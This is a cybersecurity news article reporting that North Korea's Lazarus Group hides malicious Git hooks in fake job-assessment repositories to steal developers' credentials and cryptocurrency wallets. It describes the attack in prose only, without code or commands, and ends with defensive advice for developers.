Hackers News Hackers News
  • CyberSecurity News
  • Threats
  • Attacks
  • Vulnerabilities
  • Breaches
  • Comparisons

Social Media

Hackers News Hackers News
  • CyberSecurity News
  • Threats
  • Attacks
  • Vulnerabilities
  • Breaches
  • Comparisons
Search the Site
Popular Searches:
technology Amazon AI
Recent Posts
Critical Fluentd Vulnerabilities Allow Remote Code Execution
July 1, 2026
Weaponized Google Ads Install Malicious Claude Code to Hijack macOS
July 1, 2026
Critical Adobe ColdFusion Vulnerabilities Let Attackers Run Code
July 1, 2026
Home/Threats/North Korean Hackers Use Git Hooks for Cross-Platform Malware Attacks
Threats

North Korean Hackers Use Git Hooks for Cross-Platform Malware Attacks

Key Takeaways North Korean threat actors, specifically the Lazarus Group, are leveraging Git hooks to deliver cross-platform malware. The attacks target software developers via fake job offers on...

David kimber
David kimber
May 12, 2026 4 Min Read
41 0

Key Takeaways

  • North Korean threat actors, specifically the Lazarus Group, are leveraging Git hooks to deliver cross-platform malware.
  • The attacks target software developers via fake job offers on platforms like LinkedIn, luring them into cloning malicious GitHub repositories.
  • The malware, deployed as a “pre-commit” Git hook, is designed to steal cryptocurrency wallets, credentials, and establish persistent access across Windows, macOS, and Linux systems.
  • This campaign, an evolution of the “Contagious Interview” operation, highlights a sophisticated shift toward weaponizing developer tools for initial access and payload delivery.

A new, highly sophisticated campaign attributed to North Korean state-sponsored hackers has emerged, demonstrating a significant evolution in their tactics. Rather than relying on traditional attack vectors, these threat actors are now embedding malicious code directly within Git hooks, a core feature of the version control system widely used by software developers. This strategic shift allows for the deployment of cross-platform malware by exploiting the very tools essential to modern development workflows.

Table Of Content

  • Key Takeaways
  • Git Hooks: A Covert Delivery Mechanism
  • Cross-Platform Malware and Persistence
  • What You Should Do

This operation is a continuation of the long-running “Contagious Interview” campaign, previously linked to the notorious Lazarus Group. The attackers initiate contact with software developers on professional networking sites, such as LinkedIn, under the guise of legitimate recruitment opportunities. Following initial engagement, victims are presented with a technical coding assessment hosted on a GitHub repository. The moment a developer clones this repository, the infection chain is initiated.

Researchers at OpenSourceMalware were the first to identify and detail this novel technique. Their analysis revealed that the malicious script is concealed within the repository’s .githooks directory, specifically as a pre-commit hook. This design ensures that the payload executes automatically when the developer attempts to commit code, even before the commit object is fully written to the repository. The subtle nature of this attack, combined with developers’ inherent trust in job-related coding tasks, makes it particularly challenging to detect in its early stages.

Git Hooks: A Covert Delivery Mechanism

The deployed malware exhibits cross-platform capabilities. Upon activation, the hook script intelligently identifies the victim’s operating system, then silently communicates with a remote command-and-control (C2) server to fetch the appropriate malicious payload. This adaptive approach ensures that Windows users receive a specific malware variant, while macOS and Linux users are targeted with a different, tailored version.

Regardless of the operating system, the ultimate objectives of the attack remain consistent: exfiltrate cryptocurrency wallet data, harvest sensitive user credentials, and establish a persistent backdoor for remote access to the compromised machine. Git hooks are an integral feature of Git, the distributed version control system utilized by virtually every developer globally. These automated scripts are designed to execute at predefined stages of the development lifecycle. Legitimate applications of Git hooks include enforcing coding standards, running automated tests, or validating commit messages before code is integrated.

In this malicious campaign, the Lazarus Group strategically places a harmful pre-commit hook within the GitHub repository provided to job candidates. The script itself is intentionally minimalist and appears benign upon superficial inspection. When a developer proceeds with a code commit, the hook silently runs in the background. It first fingerprints the operating system, then establishes contact with a remote server whose domain is crafted to mimic legitimate developer infrastructure.

The C2 server then delivers an OS-specific payload. For macOS and Linux systems, a shell script is provided, whereas Windows machines receive a batch-compatible payload. Both variants install persistent implants capable of stealing credentials, siphoning funds from cryptocurrency wallets, and maintaining communication with the attackers. All these malicious activities occur while the developer perceives a normal, successful commit operation.

Cross-Platform Malware and Persistence

The adaptability of this campaign across multiple operating systems is a notable feature. Most malware is designed with a single OS in mind, but this attack seamlessly delivers customized payloads for macOS, Linux, and Windows from a unified entry point. This level of operational flexibility underscores the capabilities of a well-resourced and experienced threat group, indicative of significant investment in maintaining active and sophisticated campaigns.

The implants utilized in this campaign are associated with known malware families previously employed by the Lazarus Group, including BeaverTail and InvisibleFerret. These tools are equipped with a range of functionalities, such as keylogging, remote access capabilities, browser data exfiltration, and general file theft. Furthermore, researchers have observed the use of “post-checkout” hooks. These hooks execute whenever a developer switches branches within the repository, providing the malware with additional opportunities to re-execute and maintain persistence without overt user interaction.

What You Should Do

  • Exercise Extreme Caution with External Repositories: Treat any code repository received as part of a job application or from an unknown source as potentially malicious until thoroughly vetted.
  • Inspect .githooks Directories: Before interacting with a new repository, manually inspect the .githooks directory for any suspicious scripts, especially pre-commit or post-checkout hooks. Look for unfamiliar commands, external network connections, or obfuscated code.
  • Utilize Isolated Environments: Clone and execute unknown repositories within isolated virtual machines or sandboxed environments that do not contain sensitive data or credentials.
  • Implement Organization-Wide Git Hook Policies: For development teams, establish and enforce policies for Git hook usage, potentially disallowing local hooks or requiring central management and approval of hook scripts.
  • Monitor Network Traffic for Anomalies: Implement network monitoring to detect unusual outbound connections from developer workstations, particularly those originating from Git-related processes.
  • Educate Developers on Social Engineering: Conduct regular training on social engineering tactics, especially those involving fake job offers or technical assessments designed to deliver malware.
  • Report Suspicious Activity: Share any identified malicious Git hook patterns or related Indicators of Compromise (IoCs) with threat intelligence platforms and the wider security community to aid in rapid response and defense.

Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.

Tags:

AttackHackerMalwarephishingSecurityThreat

Share Article

David kimber

David kimber

David is a penetration tester turned security journalist with expertise in mobile security, IoT vulnerabilities, and exploit development. As an OSCP-certified security professional, David brings hands-on technical experience to his reporting on vulnerabilities and security research. His articles often feature detailed technical analysis of exploits and provide actionable defense recommendations. David maintains an active presence in the security research community and has contributed to multiple open-source security tools.

Previous Post

Critical Cline AI Agent RCE Vulnerability Patched

Next Post

Critical Microsoft Teams Flaw Lets Attackers Hijack Accounts, Deliver ModeloRAT

No Comment! Be the first one.

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Popular Posts
Critical Vulnerability in Windows Drivers Lets Attackers Disable Security Software
July 1, 2026
Automotive Manufacturer Boosts SOC Triage Speed, Closes Supplier Security Gap
July 1, 2026
Microsoft Teams Blocks Uninvited Bots From Meetings
July 1, 2026
Top Authors
Marcus Rodriguez
Marcus Rodriguez
Jennifer sherman
Jennifer sherman
Emy Elsamnoudy
Emy Elsamnoudy
Let's Connect
156k
2.25m
285k

Related Posts

Jennifer sherman
By Jennifer sherman
Threats

GlassWorm Attacks macOS via Malicious VS Code…

January 1, 2026
Emy Elsamnoudy
By Emy Elsamnoudy
Attacks

ClickFix Attack Hides Malicious Code via Stegan Security

January 1, 2026
Sarah simpson
By Sarah simpson
Vulnerabilities

MongoBleed Detector Tool Released to Detect MongoDB Vulnerability(CVE-2025-14847)

January 1, 2026
Emy Elsamnoudy
By Emy Elsamnoudy
Breaches

Conti Ransomware Gang Leaders & Infrastructure Exposed

January 1, 2026
Hackers News Hackers News
  • [email protected]

Quick Links

  • Contact Us
  • Privacy Policy
  • Terms of service

Categories

Attacks
Breaches
Comparisons
CyberSecurity News
Threats
Vulnerabilities

Let's keep in touch

receive fresh updates and breaking cyber news every day and week!

All Rights Reserved by HackersRadar ©2026

Follow Us